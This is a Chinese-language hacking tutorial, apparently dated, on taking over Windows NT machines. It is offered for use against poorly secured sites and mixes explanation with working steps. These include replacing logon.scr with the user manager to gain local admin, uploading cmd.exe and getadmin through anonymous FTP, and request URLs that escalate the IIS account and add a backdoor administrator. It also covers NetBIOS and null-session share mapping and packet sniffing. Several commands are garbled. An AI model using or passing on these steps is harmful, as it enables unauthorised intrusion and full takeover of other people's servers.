如果你有普通用戶帳號,有個一個很簡單的方法獲取NT Administrator帳號:
先把c:winntsystem32下的logon.scr改名為logon.old備份
然后把usrmgr.exe改名為logon.scr
然后重新啟動
logon.scr是啟動時加載的程序,重新啟動后,不會出現以往的登陸密碼輸入界面,而是用戶管理器。
這時他就有權限把自己加到Administrator組
不要忘記把文件名改回來啊!
之二:
下面的技術適用于不重視NT網絡安全的網站,
一些 http的技術也可以供較高級的人員參考
進入NT網絡可以采取下面的步驟:
因為NT的IIS server的ftp一般都是允許anonymous匿名帳號進入的,有些anonymous的帳號還有upload權限,我們就要攻擊這類站點。因為如果不允許匿名帳號,就可能造成明文密碼在網上傳輸。用tcpspy的工具可以截獲這些密碼。現在不談這些比較高級的技術。
正因為允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
ntsvr2這個東西暴露了其NETbios名,那么在IIS的背景下,必然會有一個IUSER_ntsvr2的用戶帳號,屬于Domain user組,這個帳號我們以后要用來獲取Administrator的權限
User (www.xxx.comnone)):anonymous
Password: 輸入 guest@ 或者guest
對于缺乏網絡安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號,雖然只屬于Domain guest組
在這種情況下我們就可以進NT server的ftp了。
進去以后,看看目錄列表,試試 cd /c 或wwwroot等關鍵目錄,如果運氣好,改變目錄成功,這時你就有了80%的把握。
現在,開始查找cgi-bin目錄(或者scripts目錄),進去以后,
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin
然后輸入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
大約十多秒后屏幕顯示:
CGI Error
這時有90%的可能是:你已經把IUSER_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:winntsystem32 et.exe user china news /add
這樣就創建了一個叫china用戶,密碼是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帳號登陸,就可以有最大的權限了,也可以用上面的cmd.exe的方法直接修改如果沒有cmd.exe,也可以自己傳一個上去到scripts/tools或者cgi-bin目錄
之三:
用NT的Netbios技術掃描
nbtstat -a http://www.xxx.com/
或者
nbtstat -A http://www.xxx.com/
這樣可以得到其域的共享資源名稱
net view file://www.xxx.com/
可以獲得其機器的共享資源名稱,如果有c盤
net use f: file://www.xxx.com/c
可以用f:映射其c盤
net use $">\111.111.111.111ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;
之四: Unix下移植過來的工具:
Windows95"amp;98的用戶可以用這個tcp/ip工具去抓tcp/ip連接中的包:
WinDump95.exe 使用前還要下載這個庫 Packet95.exe
WindowsNT用戶的版本
WinDump.exe PacketNT.exe